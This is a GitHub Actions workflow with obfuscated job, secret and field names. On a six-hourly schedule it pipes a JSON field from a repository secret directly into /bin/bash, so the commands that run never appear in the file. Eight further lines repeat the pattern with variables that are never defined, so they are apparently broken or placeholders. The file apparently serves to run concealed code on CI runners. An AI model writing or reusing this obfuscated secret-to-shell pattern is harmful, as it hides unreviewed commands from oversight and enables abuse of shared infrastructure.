name: hongqikx

on:
  workflow_dispatch:
  schedule:
    - cron: '57 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: hongqikx
        env:
          r13: ${{ secrets.r13 }}
        run: |
          echo $r13 | jq -r .djps8091 | /bin/bash
          echo $umv51 | jq -r .fmyfi2 | /bin/bash
          echo $ran8225 | jq -r .tzy0 | /bin/bash
          echo $lmu70869 | jq -r .uk196 | /bin/bash
          echo $tdfn46 | jq -r .u9318 | /bin/bash
          echo $ejx09366 | jq -r .sor77 | /bin/bash
          echo $gslg4964 | jq -r .zlslx87493 | /bin/bash
          echo $t6 | jq -r .ogf887 | /bin/bash
          echo $iswhq87 | jq -r .jt43345 | /bin/bash

